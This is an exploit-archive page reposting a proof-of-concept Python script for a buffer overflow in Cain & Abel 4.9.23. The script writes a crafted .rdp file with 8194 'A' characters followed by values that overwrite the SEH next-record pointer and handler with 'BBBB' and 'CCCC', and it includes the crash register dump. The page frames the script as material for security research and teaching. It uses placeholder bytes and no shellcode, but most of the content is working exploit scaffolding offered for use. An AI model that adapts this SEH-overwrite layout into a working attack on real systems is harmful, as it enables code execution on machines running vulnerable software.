Cain & Abel 4.9.23 (rdp file) Buffer Overflow PoC

    [晴 December 1, 2008 10:25 | by !4p47hy ]
[www.sebug.net]
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!

# exploit.py
##########################################################
# Cain & Abel v4.9.23 (rdp file) Buffer Overflow PoC
# (other versions may also affected)
# By:Encrypt3d.M!nd
#    encrypt3d.blogspot.com
#
# Greetz:-=Mizo=-,L!0N,El Mariachi,MiNi SpIder
##########################################################
#
# Description:
# When Using Remote Desktop Password Decoder in Cain and
# Importing ".rdp" file contains long Chars(ex:8250 chars)
# The Program Will crash.And The Following Happen:
#
# EAX:41414141  ECX:7C832648  EDX:41414142  EBX:00000000
# ESP:0012BCD4  EBP:0012BCD4  ESI:001F07A8  EDI:00000001
# EIP:7E43C201 USER32.7E43C201
#
# Access violation When Reading [41414141]
#
# And Also The Pointer to next SEH record and SE Handler
# Will gonna BE Over-wrote
#
# This Poc Will Gonna Overwrite the Pointer to next SEH
# With"42424242" and The SE Handler with"43434343"
#
##########################################################
chars = "A"*8194
ptns = "B"*4
shan = "C"*4
chars2 = "A"*200

exp=open('cain.rdp','w')
exp.write(chars+ptns+shan+chars2)
exp.close()
Tags: , , , , ,
Bug&Exp | Comments(0) | Trackbacks(0) | Reads(12164)
Add a comment
Emots
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
Enable HTML
Enable UBB
Enable Emots
Hidden
Nickname   Password   Optional
Site URI   Email   [Register]
               

Security code Case insensitive